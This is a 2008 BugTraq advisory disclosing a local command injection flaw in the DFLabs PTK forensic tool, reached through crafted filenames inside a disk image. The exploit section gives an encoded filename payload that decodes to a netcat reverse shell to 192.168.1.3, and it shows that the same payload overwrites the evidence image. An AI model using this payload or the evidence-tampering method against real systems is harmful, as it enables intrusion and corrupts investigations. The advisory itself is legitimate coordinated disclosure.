BugTraq
DFLabs PTK Forensic Local Command Execution Vulnerability Nov 05 2008 07:48PM
luca carettoni ikkisoft com
====================================================

Security Research Advisory

Vulnerability name: DFLabs PTK Local Command Execution Vulnerability

Advisory number: LC-2008-07

Advisory URL: http://www.ikkisoft.com

====================================================

1) Affected Software

* DFLabs PTK 1.0 (final release)

Previous versions are affected as well:

* DFLabs PTK 0.2

* DFLabs PTK 0.1

====================================================

2) Severity

Severity: High

Local/Remote: Local

Note: remote command execution is possible and moreover

easy to trigger; however, due to the nature of the tool, only

the local command execution poses a serious real world threat

====================================================

3) Summary

As reported in the project website, "PTK is an alternative advanced interface

for the suite TSK (The Sleuth Kit). [...] PTK is not just a new graphic and

highly professional interface based on Ajax technology but offers a great deal

of features like analysis, search and management of complex cases of digital

investigation". PTK is included within the SANS Investigative Forensic Toolkit

(SIFT) Workstation.

This application is vulnerable to multiple input validation attacks. The

possibility to exploit these findings introduces several malicious scenarios.

For instance, a criminal may abuse this specific vulnerability to modify

the evidence of the crime, compromising the digital investigation workstation.

Even if the original evidence should be accessed only in read-only mode,

using also hardware write blockers according to forensic best practices,

several malicious scenarios are possible with just the alteration of the

working copy image. Additionally, a payload could be crafted to hide,

or alter, just the information presented to the analyst, something which

would not be evident unless the same image is analyzed with a tool not

vulnerable to the attack.

In our research, we have developed a reliable Proof-of-Concept in order

to exploit an arbitrary local command execution vulnerability showing possible

anti forensic attacks. As defined by Rogers D. M. (2005), anti forensics

attempts to "negatively affect the existence, amount and/or quality of

evidence from a crime scene, or make the analysis and examination of evidence

difficult or impossible to conduct".

References:

http://ptk.dflabs.com/

http://en.wikipedia.org/wiki/Counter_forensics

====================================================

4) Vulnerability Details

The PTK interface is prone to multiple input validation vulnerabilities that may

result in a silent local command execution.

Since the application fails to validate most of the input vectors, Cross Site

Scripting, CSRF and other flaws are possible. However, due to the nature of the

tool, our research aimed to point out the possible risks and attack techniques

which could be used in order to silently compromise the investigation platform

and corrupt evidence without user interaction.

Even if the application is vulnerable to remote command execution, as a real life

threat it is pretty unrealistic. PTK, as well as Autopsy, are usually used in the

"localhost" context where a single user (the investigator) analyzes the crime image.

However, in our humble opinion, a local command execution vulnerability triggered

by the simple inclusion of the acquired crime scene image should be considered

as an HIGH impact flaw with an HIGH exploitability rate.

Once the investigator has loaded the binary image (e.g. a "dd" file), he can

browse the filesystem tree and look for a specific file. During the browsing,

the Ajax-based application uses binaries of the Sleuth Kit in order to access

the acquired image content. In the browsing, the "fls" application is involved.

As illustrated in the man, it lists the files and directory names in the image

and can display file names of recently deleted files for the directory using the

given inode.

Once the investigator selects a specific file from the image filesystem, PTK

invokes the following script:

/ptk/lib/file_content.php?arg1=null&arg2=107533&arg3=<FILENAME>&arg4=1

where <FILENAME> is the filename without any kind of input validation retrieved

from the image via fls.

A malicious user (e.g. a person under investigation) may abuse this attack input

simply creating a crafted file in his/her filesystem, as demonstrated below.

Due to the possibility to pollute the "arg3" variable, we can also override the

"arg1" HTTP parameter with the following content:

arg3 --> Confidential.doc&arg1=[new arg1 variable value]

This request is managed by PTK using the following code:

[..]

$offset = $_GET['arg1'];

$inode = $_GET['arg2'];

$name = $_GET['arg3'];

$partition_id = $_GET['arg4'];

$page_offset = 100;

[..]

$type = get_file_type($_SESSION['image_path'], $offset, $inode);

[..]

where the function "get_file_type" is:

function get_file_type($path, $offset, $inode){

include("../config/conf.php");

if($offset == 'null'){

$offset = '';

}else{

$offset = "-o $offset";

}

if($inode == 'null') $inode = '';

$result = shell_exec("$icat_bin -r $offset $path $inode | $file_bin -zb -");

if(preg_match("/(image data)|(PC bitmap data)/", $result)){

$_SESSION['is_graphic'] = 1;

}

return $result;

}

As you can see, the $offset variable used within the unfiltered shell_exec

function could be used in order to execute arbitrary system commands

with the privileges of the web server.

Since the malicious payload should be included in the filename, some obfuscation

techniques are pretty interesting in order to force PTK to not reveal the real filename.

Several possibilities were tested, including the usage of UTF-7 encoding since PTK

does not force a specific page charset. However the most reliable and easy to use

technique is the inclusion of fake HTML tags:

Confidential.doc<aa&arg1=[ENCODED PAYLOAD]>

It should be noted that the simple injection of HTML tag chars ("<", "&", ">", ..)

is not possible due to HTML filtering which results in the corresponding HTML entities.

Lastly, we want to inform the PTK team that other functions are probably vulnerable

to similar attacks. Several instances of the "shell_exec" PHP function are present

in the "/lib" files and they are used with unfiltered parameters:

/lib/check_image_integrity.php

/lib/folder_browsing.php

/lib/lib_command.php

/lib/new_image.php

$ grep -R "shell_exec(" ./lib/ | wc -l

73

Since PTK needs to execute system commands in order to invoke the Sleuth Kit

binaries, no standard mitigations are applicable (e.g. disable_functions,

safe_mode and others).

====================================================

5) Exploit

The attacker can use this crafted filename in order to silently trigger the

arbitrary command execution and open a remote shell:

Confidential.doc<aa&arg1=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%7
3%68%20

%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33%34%35%3b>

From the application point of view, it results in the following commands:

"/usr/local/bin/icat -r -o a;nc -e /bin/bash 192.168.1.3 12345;> /var/www/ptk/

images/myCase_myCrime.001 1936 | /usr/bin/file -zb -"

In addition to the remote shell, this payload compromises the crime evidence

because the char ">" acts as an output redirection in the shell, resulting in

the acquired image overriding. If the image was added using the option "symlink",

the working-copy crime image is fatally compromised. Obviously, according to the

forensic best practices, the original image should be accessed in read-only mode

and carefully stored.

A demonstration video of the attack is provided as well.

- http://www.vimeo.com/2161045 (High quality streaming)

- http://uk.youtube.com/watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming)

- http://www.ikkisoft.com/stuff/ptk_exploit_poc.avi

According to the PTK Practice Cases (http://ptk.dflabs.com/tutorial.html),

a standard Linux Ubuntu with Apache, MySQL and PHP5 was used during our test.

====================================================

6) Fix Information

A software update is required in order to resolve this issue.

The PTK team has released a new version (ptk-1.0.1.tar.gz, 04/11/2008),

available on the project website.

Upgrade your PTK as soon as possible!

The new version deploys OWASP PHP filters to avoid unexpected input used

within Sleuth Kit binaries.

In order to clarify their position about security bug reports, the team has

published the following comment: http://ptk.dflabs.com/faq.html

====================================================

7) Time Table

30/10/2008 - Vendor notified.

30/10/2008 - Vendor response.

04/11/2008 - Vendor patch release.

05/11/2008 - Public disclosure.

====================================================

8) Credits

Discovered by Luca "ikki" Carettoni - luca.carettoni[at]ikkisoft[dot]com

====================================================

9) Legal Notices

The information in the advisory is believed to be accurate at the time of

publishing based on currently available information.

This information is provided as-is, as a free service to the community.

There are no warranties with regard to this information.

The author does not accept any liability for any direct, indirect,

or consequential loss or damage arising from use of, or reliance on, this information.

Permission is hereby granted for the redistribution of this alert, provided

that the content is not altered in any way, except reformatting, and that due

credit is given.

This vulnerability has been disclosed in accordance with

the RFP Full-Disclosure Policy v2.0, available at:

http://www.wiretrip.net/rfp/policy.html

====================================================

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus